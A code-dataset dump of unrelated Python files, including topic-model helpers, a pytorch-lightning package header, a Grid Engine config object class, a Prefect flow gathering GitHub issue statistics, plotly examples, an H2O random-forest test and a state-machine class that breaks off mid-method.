f_wi_wj = -1 + ( np.log(D_wi) + np.log(D_wj) - 2.0 * np.log(D) ) / ( np.log(D_wi_wj) - np.log(D) )
# update tmp:
tmp += f_wi_wj
j += 1
counter += 1
# update TC_k
TC_k += tmp
TC.append(TC_k)
#print('counter: ', counter)
#print('num topics: ', len(TC))
TC = np.mean(TC) / counter
print('Topic coherence is: {}'.format(TC))
def nearest_neighbors(word, embeddings, vocab):
vectors = embeddings.data.cpu().numpy()
index = vocab.index(word)
print('vectors: ', vectors.shape)
query = vectors[index]
print('query: ', query.shape)
ranks = vectors.dot(query).squeeze()
denom = query.T.dot(query).squeeze()
denom = denom * np.sum(vectors**2, 1)
denom = np.sqrt(denom)
ranks = ranks / denom
mostSimilar = []
[mostSimilar.append(idx) for idx in ranks.argsort()[::-1]]
nearest_neighbors = mostSimilar[:20]
nearest_neighbors = [vocab[comp] for comp in nearest_neighbors]
return nearest_neighbors
import nltk
from nltk.collocations import *
import matplotlib.pyplot as plt
import os
def bigrams(big_document):
ignored_words = nltk.corpus.stopwords.words('english')
ignored_words.append('percent')
ignored_words.append('governor')
ignored_words.append('dont')
# bigram_measures = nltk.collocations.BigramAssocMeasures()
finder = BigramCollocationFinder.from_documents(big_document)
finder.apply_word_filter(lambda w: len(w) < 3 or w.lower() in ignored_words)
finder.apply_freq_filter(150)
return [' '.join(x) for x in list(finder.ngram_fd.keys())]
def trigram(big_document):
ignored_words = nltk.corpus.stopwords.words('english')
ignored_words.append('percent')
ignored_words.append('governor')
ignored_words.append('dont')
# trigram_measures = nltk.collocations.TrigramAssocMeasures()
finder = TrigramCollocationFinder.from_documents(big_document)
finder.apply_word_filter(lambda w: len(w) < 3 or w.lower() in ignored_words)
finder.apply_freq_filter(100)
return [' '.join(x) for x in list(finder.ngram_fd.keys())]
def replace_collocation(string, dict_collocation):
for key in dict_collocation.keys():
string = string.replace(key, dict_collocation[key])
return string
def plot_word_cloud(text, filename='wordcloud.eps', format='eps',
width=1000, height=500, background_color='white', figsize=(10,6), dpi=100, bbox_inches='tight'):
from wordcloud import WordCloud
meeting_string = (" ").join([word for line in text for word in line])
wordcloud = WordCloud(width=width, height=height, background_color=background_color).generate(meeting_string)
fig = plt.figure(figsize=figsize)
plt.subplots_adjust(left=0, right=1, top=1, bottom=0)
plt.imshow(wordcloud)
plt.axis("off")
fig.tight_layout()
plt.savefig(os.path.join(PLOT_PATH, filename), format=format, dpi=dpi, bbox_inches=bbox_inches)
| StarcoderdataPython |
1736789 | """Package info"""
__version__ = '0.6.0'
__author__ = '<NAME> et al.'
__author_email__ = '<EMAIL>'
__license__ = 'Apache-2.0'
__copyright__ = 'Copyright (c) 2018-2019, %s.' % __author__
__homepage__ = 'https://github.com/PyTorchLightning/pytorch-lightning'
# this has to be simple string, see: https://github.com/pypa/twine/issues/522
__docs__ = "PyTorch Lightning is the lightweight PyTorch wrapper for ML researchers." \
" Scale your models. Write less boilerplate."
try:
# This variable is injected in the __builtins__ by the build
# process. It used to enable importing subpackages of skimage when
# the binaries are not built
__LIGHTNING_SETUP__
except NameError:
__LIGHTNING_SETUP__ = False
if __LIGHTNING_SETUP__:
import sys
sys.stderr.write('Partial import of skimage during the build process.\n')
# We are not importing the rest of the scikit during the build
# process, as it may not be compiled yet
else:
from .trainer.trainer import Trainer
from .core.lightning import LightningModule
from .core.decorators import data_loader
import logging
__all__ = [
'Trainer',
'LightningModule',
'data_loader',
]
logging.basicConfig(level=logging.INFO)
| StarcoderdataPython |
3367542 | <filename>solum-6.0.0/solum/tests/common/test_hacking.py<gh_stars>0
# Copyright 2015 Intel, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import pep8
import textwrap
from solum.hacking import checks
from solum.tests import base
class HackingTestCase(base.BaseTestCase):
# We are patching pep8 so that only the check under test is actually
# installed.
@mock.patch('pep8._checks',
{'physical_line': {}, 'logical_line': {}, 'tree': {}})
def _run_check(self, code, checker, filename=None):
pep8.register_check(checker)
lines = textwrap.dedent(code).strip().splitlines(True)
checker = pep8.Checker(filename=filename, lines=lines)
checker.check_all()
checker.report._deferred_print.sort()
return checker.report._deferred_print
def _assert_has_errors(self, code, checker, expected_errors=None,
filename=None):
actual_errors = [e[:3] for e in
self._run_check(code, checker, filename)]
self.assertEqual(expected_errors or [], actual_errors)
def _assert_has_no_errors(self, code, checker, filename=None):
self._assert_has_errors(code, checker, filename=filename)
def test_no_mutable_default_args(self):
self.assertEqual(1, len(list(checks.no_mutable_default_args(
"def get_info_from_bdm(virt_type, bdm, mapping=[])"))))
self.assertEqual(0, len(list(checks.no_mutable_default_args(
"defined = []"))))
self.assertEqual(0, len(list(checks.no_mutable_default_args(
"defined, undefined = [], {}"))))
| StarcoderdataPython |
1626210 | <reponame>gridengine/config-api<gh_stars>1-10
#!/usr/bin/env python
#
# ___INFO__MARK_BEGIN__
#######################################################################################
# Copyright 2016-2021 Univa Corporation (acquired and owned by Altair Engineering Inc.)
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License.
#
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#######################################################################################
# ___INFO__MARK_END__
#
import copy
import datetime
import json
import os
import tempfile
from uge.config.config_manager import ConfigManager
from uge.exceptions.invalid_argument import InvalidArgument
from uge.exceptions.invalid_request import InvalidRequest
class QconfObject(object):
""" This class encapsulates data and functionality common to all Qconf API objects. """
VERSION = '1.0'
NAME_KEY = None
UGE_PYTHON_OBJECT_MAP = {
'NONE': None,
'INFINITY': float('inf'),
'TRUE': True,
'FALSE': False,
}
UGE_CASE_SENSITIVE_KEYS = {}
USER_PROVIDED_KEYS = []
REQUIRED_DATA_DEFAULTS = {}
BOOL_KEY_MAP = {}
INT_KEY_MAP = {}
FLOAT_KEY_MAP = {}
LIST_KEY_MAP = {}
DEFAULT_LIST_DELIMITER = ','
DICT_KEY_MAP = {}
DEFAULT_DICT_DELIMITER = ','
DICT_VALUE_DELIMITER = '='
OPTIONAL_KEYS_ALLOWED = False
def __init__(self, name=None, data=None, metadata=None, json_string=None):
"""
Class constructor.
:param name: Object name. If provided, it will override object's name from data or JSON string parameters.
:type name: str
:param data: Object data. If provided, it will override corresponding data from object's JSON string representation.
:type data: varies
:param metadata: Object metadata. If provided, it will override corresponding metadata from object's JSON string representation.
:type metadata: dict
:param json_string: Object's JSON string representation.
:type json_string: str
:raises: **InvalidArgument** - in case metadata is not a dictionary, JSON string is not valid, or it does not contain dictionary representing a Qconf object.
"""
self.name = name
self.metadata = {}
if not hasattr(self, 'data'):
self.data = {}
# Unpack and check json
json_dict = self.unpack_input_json(json_string)
if json_dict:
if 'data' in json_dict:
self.data = json_dict.get('data')
del json_dict['data']
self.metadata = json_dict
# Merge json entries with provided metadata
if metadata:
self.check_input_metadata(metadata)
self.metadata.update(metadata)
# Merge json entries with provided data
if data:
self.check_input_data(data)
if type(data) == dict:
self.data.update(data)
else:
self.data = data
if name and self.NAME_KEY:
self.data[self.NAME_KEY] = name
# Convert list and dict keys
self.convert_list_keys()
self.convert_dict_keys()
# Add standard metadata
self.metadata['object_version'] = self.VERSION
self.metadata['object_class'] = self.__class__.__name__
def unpack_input_json(self, json_string):
if not json_string:
return None
try:
json_dict = json.loads(json_string)
except Exception as ex:
raise InvalidArgument('Input is not a valid json string: %s (error: %s).' % (str(json_string), ex))
if type(json_dict) != dict:
raise InvalidArgument('Input json string does not contain dictionary: %s.' % str(json_string))
return json_dict
def check_user_provided_keys(self):
"""
Checks for presence of all data keys that must be provided by user.
:raises: **InvalidRequest** - in case object's data is not a dictionary, or if any of the required keys are missing.
"""
if type(self.data) != dict:
raise InvalidRequest('Data object is not a dictionary: %s.' % str(self.data))
for key in self.USER_PROVIDED_KEYS:
if not self.data.get(key):
raise InvalidRequest('Input data is missing required object key: %s.' % str(key))
def check_input_data(self, data):
pass
def check_input_metadata(self, metadata):
if metadata:
if type(metadata) != dict:
raise InvalidArgument('Provided metadata is not a dictionary: %s.' % str(metadata))
def remove_optional_keys(self):
"""
Removes values for keys that are not required from object's data.
:raises: **InvalidRequest** - in case object's data is not a dictionary.
"""
if self.OPTIONAL_KEYS_ALLOWED:
return
if type(self.data) != dict:
raise InvalidRequest('Data object is not a dictionary: %s.' % str(self.data))
removed_keys = []
for (key, value) in list(self.data.items()):
if key not in self.get_required_data_defaults():
if key not in self.USER_PROVIDED_KEYS and not key.startswith('#'):
removed_keys.append(key)
for key in removed_keys:
del self.data[key]
def update_with_required_data_defaults(self):
"""
Updates object with default values for required data keys.
:raises: **InvalidArgument** - in case object's data is not a dictionary.
"""
if type(self.data) != dict:
raise InvalidRequest('Data object is not a dictionary: %s.' % str(self.data))
for (key, value) in list(self.get_required_data_defaults().items()):
if key not in self.data:
if type(value) == bytes:
for env_var in ['SGE_ROOT', 'SGE_CELL']:
value = value.replace(env_var, os.environ[env_var])
self.data[key] = value
def get_tmp_file(self):
fd, tmp_file_path = tempfile.mkstemp(text=True)
tmp_file = os.fdopen(fd, 'w')
tmp_dir_path = None
return (tmp_file, tmp_file_path, tmp_dir_path)
def get_required_data_defaults(self):
return self.REQUIRED_DATA_DEFAULTS
def convert_list_keys(self):
for key in list(self.LIST_KEY_MAP.keys()):
value = self.data.get(key)
if value is not None:
if type(value) == bytes or type(value) == str:
delimiter = self.LIST_KEY_MAP.get(key, self.DEFAULT_LIST_DELIMITER)
self.data[key] = value.split(delimiter)
elif type(value) != list:
raise InvalidArgument(
'Value for key %s must be provided either as a string, or as a python list of strings.' % key)
def parse_value_as_dict(self, key, value):
delimiter = self.DICT_KEY_MAP.get(key, self.DEFAULT_LIST_DELIMITER)
items = value.split(delimiter)
value_dict = {}
for item in items:
if item.find(self.DICT_VALUE_DELIMITER) < 0:
raise InvalidArgument(
'Cannot parse dictionary value: Unexpected format of item %s for key %s.' % (item, key))
item_tokens = item.split(self.DICT_VALUE_DELIMITER)
item_key = item_tokens[0]
item_value = self.DICT_VALUE_DELIMITER.join(item_tokens[1:])
value_dict[item_key] = self.uge_to_py(item_key, item_value)
return value_dict
def convert_dict_keys(self):
for key in list(self.DICT_KEY_MAP.keys()):
value = self.data.get(key)
if value is not None:
if type(value) == bytes:
self.data[key] = self.parse_value_as_dict(key, value)
elif type(value) != dict:
raise InvalidArgument(
'Value for key %s must be provided either as a string, or as a python dictionary.' % key)
def set_data_dict_from_qconf_output(self, qconf_output):
data = self.to_dict(qconf_output)
self.data = data
@classmethod
def get_list_from_qconf_output(cls, qconf_output):
qconf_output = qconf_output.strip()
qconf_list = []
if len(qconf_output):
qconf_list = qconf_output.split('\n')
return qconf_list
@classmethod
def get_bool_key_map(cls, key_map):
bool_key_map = {}
for (key, value) in list(key_map.items()):
if type(value) == bool:
bool_key_map[key] = value
elif type(value) == dict:
for (key2, value2) in list(value.items()):
if type(value2) == bool:
bool_key_map[key2] = value2
return bool_key_map
@classmethod
def get_int_key_map(cls, key_map):
int_key_map = {}
for (key, value) in list(key_map.items()):
if type(value) == int:
int_key_map[key] = value
elif type(value) == dict:
for (key2, value2) in list(value.items()):
if type(value2) == int:
int_key_map[key2] = value2
return int_key_map
@classmethod
def get_float_key_map(cls, key_map):
float_key_map = {}
for (key, value) in list(key_map.items()):
if type(value) == float:
float_key_map[key] = value
return float_key_map
@classmethod
def get_list_key_map(cls, key_map):
list_key_map = {}
for (key, value) in list(key_map.items()):
if type(value) == list:
list_key_map[key] = value
return list_key_map
def uge_to_py(self, key, value):
uppercase_value = value.upper()
for (uge_value, py_value) in list(self.UGE_PYTHON_OBJECT_MAP.items()):
if uge_value == uppercase_value:
return py_value
if key in self.LIST_KEY_MAP:
# Key is designated as list key.
# Try to split by corresponding delimiter.
delimiter = self.LIST_KEY_MAP.get(key)
if value.find(delimiter) > 0:
return value.split(delimiter)
else:
return [value]
elif key in self.DICT_KEY_MAP:
# Key is designated as dict key.
# Try to split by corresponding delimiter.
return self.parse_value_as_dict(key, value)
elif key in self.INT_KEY_MAP:
try:
return int(value)
except:
# We cannot convert this string to int
pass
elif key in self.FLOAT_KEY_MAP:
try:
return float(value)
except:
# We cannot convert this string to float
pass
elif value.find(self.DEFAULT_LIST_DELIMITER) > 0:
return value.split(self.DEFAULT_LIST_DELIMITER)
return value
def py_to_uge(self, key, value):
for (uge_value, py_value) in list(self.UGE_PYTHON_OBJECT_MAP.items()):
if value == py_value and type(value) == type(py_value):
if key in self.UGE_CASE_SENSITIVE_KEYS:
return self.UGE_CASE_SENSITIVE_KEYS[key](uge_value)
return uge_value
if type(value) == list:
delimiter = self.LIST_KEY_MAP.get(key, self.DEFAULT_LIST_DELIMITER)
return delimiter.join(value)
elif type(value) == dict:
delimiter = self.DICT_KEY_MAP.get(key, self.DEFAULT_DICT_DELIMITER)
dict_tokens = []
for (item_key, item_value) in list(value.items()):
dict_tokens.append('%s%s%s' % (item_key, self.DICT_VALUE_DELIMITER, item_value))
return delimiter.join(dict_tokens)
return value
def to_uge(self):
"""
Converts object to string acceptable as input for UGE qconf command.
:returns: Object's UGE-formatted string.
"""
lines = ''
for (key, value) in list(self.data.items()):
lines += '%s %s\n' % (key, self.py_to_uge(key, value))
return lines
def convert_data_to_uge_keywords(self, data):
for (key, value) in list(data.items()):
data[key] = self.py_to_uge(key, value)
def to_json(self, use_uge_keywords=False):
"""
Converts object to JSON string.
:param use_uge_keywords: if True, UGE keywords (e.g. 'NONE') are restored before conversion to JSON; otherwise, no changes are made to object's data. Default is False.
:type mode: bool
:returns: Object's JSON representation.
"""
json_dict = copy.copy(self.metadata)
data = copy.copy(self.data)
if use_uge_keywords:
self.convert_data_to_uge_keywords(data)
json_dict['data'] = data
return json.dumps(json_dict)
def to_dict(self, input_string):
lines = input_string.split('\n')
object_data = {}
for line in lines:
if not line:
continue
key_value = line.split(' ')
key = key_value[0]
value = line.replace(key, '', 1).strip()
object_data[key] = self.uge_to_py(key, value)
return object_data
def set_get_metadata(self):
"""
Sets default object metadata (user/timestamp) for API get operations.
"""
cm = ConfigManager.get_instance()
retrieved_by = '%s@%s' % (cm['user'], cm['host'])
self.metadata['retrieved_by'] = retrieved_by
self.metadata['retrieved_on'] = datetime.datetime.now().isoformat()
def set_modify_metadata(self):
"""
Sets default object metadata (user/timestamp) for API modify operations.
"""
cm = ConfigManager.get_instance()
modified_by = '%s@%s' % (cm['user'], cm['host'])
self.metadata['modified_by'] = modified_by
self.metadata['modified_on'] = datetime.datetime.now().isoformat()
def set_add_metadata(self):
"""
Sets default object metadata (user/timestamp) for API add operations.
"""
cm = ConfigManager.get_instance()
created_by = '%s@%s' % (cm['user'], cm['host'])
self.metadata['created_by'] = created_by
self.metadata['created_on'] = datetime.datetime.now().isoformat()
| StarcoderdataPython |
78076 | <reponame>andersy005/pydata-issue-tracker-datasette
import requests
import os
import collections
import pandas as pd
import datetime
import itertools
import pathlib
from prefect import Flow, task, unmapped, Parameter
from prefect.triggers import all_successful
headers = {'Authorization': f"token {os.environ['GH_TOKEN']}"}
@task(max_retries=3, retry_delay=datetime.timedelta(minutes=1))
def get_repo_data(project, time):
def run_query(
query, variables={}
): # A simple function to use requests.post to make the API call. Note the json= section.
request = requests.post(
'https://api.github.com/graphql',
json={'query': query, 'variables': variables},
headers=headers,
)
if request.status_code == 200:
return request.json()
else:
raise Exception(
'Query failed to run by returning code of {}. {}'.format(
request.status_code, query
)
)
entry = {'project': f'{project.org}/{project.repo}', 'time': time}
states = [('OPEN', 'OPEN'), ('CLOSED', 'MERGED')]
data = []
query = """
query($org:String!, $repo:String!, $issue_state:[IssueState!], $pr_state:[PullRequestState!]){
repository(owner: $org, name: $repo) {
issues(states: $issue_state) {
totalCount
}
pullRequests(states: $pr_state) {
totalCount
}
}
}"""
for items in states:
result = run_query(
query,
variables={
'org': project.org,
'repo': project.repo,
'issue_state': items[0],
'pr_state': items[1],
},
)
entry[f'{items[0].lower()}_issues'] = result['data']['repository'][
'issues'
]['totalCount']
entry[f'{items[1].lower()}_pull_requests'] = result['data']['repository'][
'pullRequests'
]['totalCount']
data.append(entry)
return data
@task
def merge_data(data):
entries = itertools.chain(*data)
df = pd.DataFrame(entries)
df['time'] = df.time.dt.round('H')
df['hour'] = df.time.dt.hour
df['day'] = df.time.dt.day
df['week'] = df.time.dt.isocalendar().week
df['weekend'] = df.time.dt.weekday.map(lambda x: 'weekday' if x < 5 else 'weekend')
df['quarter'] = df.time.dt.quarter.map({1: 'Q1: Jan - Mar', 2: 'Q2: Apr - Jun', 3: 'Q3: Jul - Sep', 4: 'Q4: Oct - Dec'})
return df
@task
def save_data(data, data_file):
try:
df = pd.read_json(data_file, convert_dates=['time'])
except Exception:
df = pd.DataFrame()
print(df.shape)
if not df.empty:
data = pd.concat([df, data])
data = data.drop_duplicates(subset=['project', 'time']).sort_values(by='time')
with open(data_file, 'w', encoding='utf-8') as outfile:
data.to_json(outfile, orient='records', indent=2, force_ascii=False)
def transform(row):
return [{'date': row.time.round('D'), 'type': 'open_issues', 'count': row.open_issues}, {'date': row.time.round('D'), 'type': 'open_pull_requests', 'count': row.open_pull_requests}]
@task
def save_project_weekly_data(project, path):
path = pathlib.Path(path)
columns= ['time', 'open_issues', 'open_pull_requests']
df = pd.read_json(path, convert_dates=['time'])
data = df[df.project == f'{project.org}/{project.repo}']
data = data[columns].groupby(data.time.dt.isocalendar().week).last()
results = pd.DataFrame(itertools.chain(*[transform(row) for _, row in data.iterrows()]))
outdir = path.parent / 'weekly'
outdir.mkdir(parents=True, exist_ok=True)
data_file = f'{outdir}/{project.repo}-weekly-data.json'
with open(data_file, 'w', encoding='utf-8') as outfile:
results.to_json(outfile, orient='records', indent=2, force_ascii=False)
with Flow('get_data') as flow:
Project = collections.namedtuple('Project', ['org', 'repo'])
projects = [
Project('pydata', 'xarray'),
Project('dask', 'dask'),
Project('dask', 'distributed'),
Project('numpy', 'numpy'),
Project('pandas-dev', 'pandas'),
Project('jupyterlab', 'jupyterlab'),
Project('matplotlib', 'matplotlib'),
]
path = Parameter('path', default=pathlib.Path('./data/data.json').absolute())
time = datetime.datetime.now()
data = get_repo_data.map(project=projects, time=unmapped(time))
df = merge_data(data)
x = save_data(df, data_file = path)
save_project_weekly_data.map(project=projects, path=unmapped(path), upstream_tasks=[unmapped(x)])
| StarcoderdataPython |
3264011 | <gh_stars>1-10
# https://plot.ly/python/
# https://docs.google.com/document/d/1DjWL2DxLiRaBrlD3ELyQlCBRu7UQuuWfgjv9LncNp_M/edit#heading=h.w8hlxhsxs4zj
from plotly.offline import iplot
from plotly.offline import init_notebook_mode
import plotly.graph_objs as go
init_notebook_mode(connected=True)
# BASICS -----------------------
# define layout
# define chart/data, keep in square brackets
# combine both into fig
# iplot them out
layout = go.Layout(width=500, \
height=500, \
title='Confusion Matrix', \
font=dict(size=8))
data = go.Heatmap(z=x,x=title,y=title)
fig = go.Figure(data=[data], layout=layout)
iplot(fig)
# Scatterplot
iplot([go.Scatter(x=[1, 2, 3], y=[3, 1, 6], mode='markers', name='label')])
# Barchart
iplot([go.Bar(x=[1, 2, 3], y=[3, 1, 6])])
# multiple plots
trace0 = go.Scatter(
x = random_x, y = random_y0,
mode = 'markers',
name = 'markers')
trace1 = go.Scatter(
x = random_x, y = random_y1,
mode = 'lines+markers',
name = 'lines+markers')
trace2 = go.Scatter(
x = random_x, y = random_y2,
mode = 'lines',
name = 'lines')
data = [trace0, trace1, trace2]
iplot(data)
## COOKIE CUTTERS
# -----------------
# TIME-SERIES LINE WITH VOLUME STOCK DATA
apple = dfm[dfm['assetCode']=='AAPL.O']
data1 = go.Scatter(
x=apple.time,
y=apple['close'],
name='Price')
data2 = go.Bar(
x=apple.time,
y=apple.volume,
name='Volume',
yaxis='y2')
data = [data1, data2]
# set double y-axis
layout = go.Layout(
title='Closing Price & Volume for AAPL.O',
yaxis=dict(
title='Price'
),
yaxis2=dict(
overlaying='y',
side='right',
range=[0, 1500000000], #increase upper range so that the volume bars are short
showticklabels=False,
showgrid=False
)
)
fig = go.Figure(data=data,layout=layout)
iplot(fig)
# CANDLESTICK -----------
data = [go.Candlestick(x=df.index,
open=df.Open,
high=df.High,
low=df.Low,
close=df.Close)]
# add range slider, change to False if not needed
layout = go.Layout(
xaxis = dict(
rangeslider = dict(
visible = True)))
fig = go.Figure(data=data,layout=layout)
iplot(fig)
# RADAR CHART -----------
data = [go.Scatterpolar(
r = [4, 1, 0, 3, 2, 5],
theta = ['Condenser Fouling','Excess Oil','Non Condensarables', 'Reduced Condenser Water Flow',
'Reduced Evaporator Water Flow', 'Refrigerant Leak', 'Refrigerant Overcharged'],
fill = 'toself'
)]
layout = go.Layout(
polar = dict(
radialaxis = dict(
visible = True,
range = [0, 5])
),
showlegend = False,
title='Fault Severity'
)
iplot(go.Figure(data=data, layout=layout)) | StarcoderdataPython |
1766658 | # file is saved as .py file because 'mat' is similar dictionary in python, nothing else
mat
{
'__header__': b'MATLAB 5.0 MAT-file, Platform: PCWIN64, Created on: Fri Nov 18 20:05:04 2016',
'__version__': '1.0',
'__globals__': [],
"""
### general structure of image_info ###
array1(
[
[
array2(
[
[
(
# array 2.1 is sparse matrix which is required to create density map of ground-truth
array2.1( [ [ 524.17564209, 611.31179232],....,[ 20.58878763, 594.48550124] ] ),
array2.2( [ [277] ] )
)
]
]
)
]
]
)
"""
# extra explanation about 2d numpy array
# let a = np.array( [ [1,2,3],[4,5,6],[7,8,9] ] )
# a.shape = (3,3)
# so 'a' will look like ,
# a = [
# [1,2,3],
# [4,5,6],
# [7,8,9]
# ]
# so, a[0] = [1,2,4], a[0][0]=a[0,0]=1, a[0][1]=a[0,1]=2......
# Preprocessing.py lines 78 and 79
# mat = io.loadmat(img_path.replace('.jpg','.mat').replace('images','ground-truth').replace('IMG_','GT_IMG_'))
# mat["image_info"][0,0][0,0][0] this line can be understand using above structure of image_info
'image_info':
array( # array1 starts
[
[ # arra1[0,0]
array( # array2 starts
[
[ # array1[0,0][0,0] or array2[0,0]
( # tuple
array( # array2.1 starts , arra1[0,0][0,0][0]
[
[ 524.17564209, 611.31179232],
[ 20.58878763, 594.48550124],
...
...
...
[ 109.35965995, 139.72929032]
]
), # array2.1 ends
array( # array2.2 starts , arra1[0,0][0,0][1]
[
[277]
]
, dtype=uint16) # array2.2 ends
)
]
]
, dtype=[('location', 'O'), ('number', 'O')]) # array2 ends
]
]
, dtype=object) #array1 ends
} | StarcoderdataPython |
146726 | # Generated by Django 2.2.1 on 2019-07-11 07:05
from django.db import migrations
import pretix.base.models.fields
class Migration(migrations.Migration):
dependencies = [
('pretixbase', '0126_item_show_quota_left'),
]
operations = [
migrations.RenameField(
model_name='question',
old_name='dependency_value',
new_name='dependency_values',
),
migrations.AlterField(
model_name='question',
name='dependency_values',
field=pretix.base.models.fields.MultiStringField(default=['']),
),
]
| StarcoderdataPython |
4841593 | def factorial(n):
# state a base case of if n equals zero
if n == 0:
# return 1
return 1
# return n multiplied by factorial called with n - 1
return n * factorial(n - 1)
print(factorial(5))
| StarcoderdataPython |
78066 | # proxy module
from pyface.grid.grid_cell_renderer import *
| StarcoderdataPython |
176314 | <filename>h2o-py/tests/testdir_algos/rf/pyunit_node_assignment_prostateRF.py
from __future__ import print_function
import sys
sys.path.insert(1,"../../../")
import h2o
from tests import pyunit_utils
from h2o.estimators.random_forest import H2ORandomForestEstimator
from h2o.tree.tree import H2OTree
def map_node_ids_to_paths():
prostate_train = h2o.import_file(path=pyunit_utils.locate("smalldata/prostate/prostate.csv"))
prostate_train["CAPSULE"] = prostate_train["CAPSULE"].asfactor()
prostate_train = prostate_train.drop("ID")
decision_tree = H2ORandomForestEstimator(ntrees=1, sample_rate=1.0, mtries=len(prostate_train.columns) - 1)
decision_tree.train(y="AGE", training_frame=prostate_train)
tree = H2OTree(
model=decision_tree,
tree_number=0,
plain_language_rules=True
)
predictions = list(decision_tree.predict(prostate_train).as_data_frame()["predict"])
node_ids = list(decision_tree.predict_leaf_node_assignment(prostate_train, type="Node_ID").as_data_frame()["T1"])
# figure out how node ids map to decision paths
decision_path_ids = list(map(lambda x: tree.node_ids.index(x), node_ids))
# check that the paths produce correct predictions
predictions_to_paths = list(zip(predictions, [tree.decision_paths[i] for i in decision_path_ids]))
for (prediction, path) in predictions_to_paths:
prediction_from_path = float(path[path.index("Prediction: ") + len("Prediction: "):])
assert abs(prediction_from_path - prediction) < 1e-6
if __name__ == "__main__":
pyunit_utils.standalone_test(map_node_ids_to_paths)
else:
map_node_ids_to_paths()
| StarcoderdataPython |
4828834 | import time
import typing
import traceback
import threading
import warnings
from .state_status import StateStatus
from .board import Board
class State():
# Name of this state
_name: str
_transitions: typing.Sequence[typing.Tuple[typing.Callable[[
'State', Board], bool], 'State']] # Store the transitions of the state
# Hold the thread executing the action
_run_thread: threading.Thread
# Status of this state
_status: StateStatus
_internal_exception: Exception
# Event acting as a flag for interruptions
_interupted_event: threading.Event
# use two variables to pass information between same-level states
flow_in: typing.Any
flow_out: typing.Any
# information about state
_state_last_start_time: float
_state_last_end_time: float
def __init__(self, name):
self._name = name
self._transitions = []
self._run_thread = None
self._interupted_event = threading.Event()
self._internal_exception = None
self._status = StateStatus.UNKNOWN
self.flow_in = None
self.flow_out = None
self._state_last_end_time = -1
self._state_last_start_time = -1
def check_name(self, compare: str) -> bool:
"""Check if this state has the same name as the given state
Parameters
----------
compare : str
Name to be checked against
Returns
-------
bool
True if the name is the same
"""
return compare == self._name
def checkName(self, compare: str) -> bool:
warnings.warn("use check_name instead", DeprecationWarning)
return self.check_name(compare)
def check_status(self, compare: StateStatus) -> bool:
"""Check whether this states's status is the same as the given status
Parameters
----------
compare : StateStatus
Enum for the status to check against
Returns
-------
bool
True if the status is the same.
"""
return self._status == compare
def checkStatus(self, compare: StateStatus) -> bool:
warnings.warn("use check_status instead", DeprecationWarning)
return self.check_status(compare)
def add_transition(self, cond: typing.Callable[['State', Board], bool], next_state: 'State') -> None:
"""Add transition to the state. Provide a checking method (cond) that when returns true, will
signal this state to transition to the state associated. Note, the transition is test in a list. If multiple
transition function returns true, the state transition to the first added state.
Parameters
----------
cond : typing.Callable[[State, Board], bool]
Function to determine if this transition should be taken
next_state : State
The next state to go to.
"""
self._transitions.append((cond, next_state))
def add_transition_after_elapsed(self, next_state: 'State', duration: float) -> None:
"""Add transition to this state that moves to the next state after a fixed duration has
passed since the state start execution.
Parameters
----------
next_state : State
Next state to go to.
duration : float
Time in seconds that should have passed before transitioning.
"""
def timepassed(s: 'State', b: 'Board'):
if s._state_last_start_time > 0 and duration >= 0:
curr_time = time.time()
if (curr_time - s._state_last_start_time) > duration:
return True
return False
self.add_transition(timepassed, next_state)
def add_transition_on_complete(self, next_state: 'State', ignore_exeception: bool = False) -> None:
"""Add transition to this state where when the state finishes execution regardless of output,
it move tos the given state.
Parameters
----------
next_state : State
State to transition to
ignore_exeception: bool
Whether to also ignore exceptions
"""
self.add_transition(lambda x, y: not x._run_thread.is_alive()
and (ignore_exeception or not x.check_status(StateStatus.EXCEPTION)), next_state)
def add_transition_on_success(self, next_state: 'State') -> None:
"""Add transition to this state where when it is succesfully, move to the given state.
Parameters
----------
next_state : State
State to transition to.
"""
self.add_transition(lambda x, y: x._status == StateStatus.SUCCESS, next_state)
def add_transition_on_failed(self, next_state: 'State') -> None:
"""Add transition to this state where when the state fails, move to the given state.
Parameters
----------
next_state : State
State to transition to
"""
self.add_transition(lambda x, y: x._status == StateStatus.FAILED, next_state)
def execute(self, board: Board) -> StateStatus:
"""All derived class should overwrite this method. It is run in a seperate thread when
the state is running
Parameters
----------
board : Board
Board object that is being passed between multiple states.
Returns
-------
StateStatus (Optional)
When the state completes, whether it is successful or not. This is a useful for shorthand transitions where
state transition when successfully complete, or not.
"""
raise NotImplementedError("Default execute method is not overwritten")
def _execute(self, board: Board):
try:
self.pre_execute()
self._status = self.execute(board)
self.post_execute()
except Exception as e:
self._internal_exception = e
self._status = StateStatus.EXCEPTION
if self._status is None:
self._status = StateStatus.NOT_SPECIFIED
def start(self, board: Board, flow_in: typing.Any = None) -> None:
self._status = StateStatus.RUNNING
self.flow_in = flow_in
self.flow_out = None
self._interupted_event.clear()
self._run_thread = threading.Thread(target=self._execute, args=(board,), name=self._name)
self._run_thread.start()
def wait(self, timeout: float = None) -> bool:
"""Wait for the current state to complete. You can also specify a timeout to prevent infinite loop
Parameters
----------
timeout : float, optional
Timeout in seconds, None will mean wait forever, by default None
Returns
-------
bool
Whether the current state finished, if false, it means timedout.
"""
if self._run_thread is not None and self._run_thread.is_alive():
self._run_thread.join(timeout)
return not self._run_thread.is_alive()
return True
def signal_interrupt(self):
self._interupted_event.set()
def interrupt(self, timeout: float = None) -> bool:
"""Interrupts the current execution of the state.
Once interrupt, this state would try to stop as
soon as possible
Parameters
----------
timeout : float, optional
timeout in seconds, by default None
Returns
-------
bool
True if the state is no longer running or interrupted. False if timeout.
"""
# signal the execute method to be interrupted.
self.signal_interrupt()
if self._run_thread is not None:
if self._run_thread.is_alive():
self._run_thread.join(timeout)
# TODO check if this creates a race condition, is_alive() might still be true immediately after run() ends.
return not self._run_thread.is_alive()
else:
return True
def is_interrupted(self) -> bool:
"""Method to check whether the state itself is being interrupted
Returns
-------
